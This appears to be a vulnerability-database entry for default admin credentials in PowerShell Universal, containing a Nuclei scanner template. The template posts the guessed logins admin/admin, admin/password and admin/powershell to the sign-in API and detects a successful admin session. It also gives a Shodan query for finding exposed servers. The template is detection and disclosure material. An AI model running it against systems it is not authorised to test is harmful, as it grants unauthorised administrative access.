powershell-default-login: PowerShell Universal - Default Login

日期: 2025-08-01 | 影响软件: PowerShell Universal | POC: 已公开

漏洞描述

PowerShell Universal default admin credentials were discovered.

PoC代码[已公开]

id: powershell-default-login

info:
  name: PowerShell Universal - Default Login
  author: ap3r
  severity: high
  description: |
    PowerShell Universal default admin credentials were discovered.
  reference:
    - https://ironmansoftware.com/powershell-universal
  metadata:
    verified: true
    max-request: 3
    shodan-query: "html:\"PowerShell Universal\""
  tags: default-login,powershell-universal,vuln

http:
  - raw:
      - |
        POST /api/v1/signin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    attack: clusterbomb
    payloads:
      username:
        - admin
      password:
        - admin
        - password
        - powershell

    host-redirects: true
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - 'Set-Cookie'

      - type: word
        part: body
        words:
          - '{"returnUrl":"/admin"}'

      - type: word
        part: body
        words:
          - '{"errorMessage":"Bad username or password"}'
        negative: true
# digest: 4b0a004830460221009c9d9249fba75f47b1da5350b8097e0841ab104a8679c036ec7e60f52a43f083022100e4ac5630db674e25ccf0a3735c9e765ff7c18ca05fecdf453d8fc04014877476:922c64590222798bb761d5b6d8e72950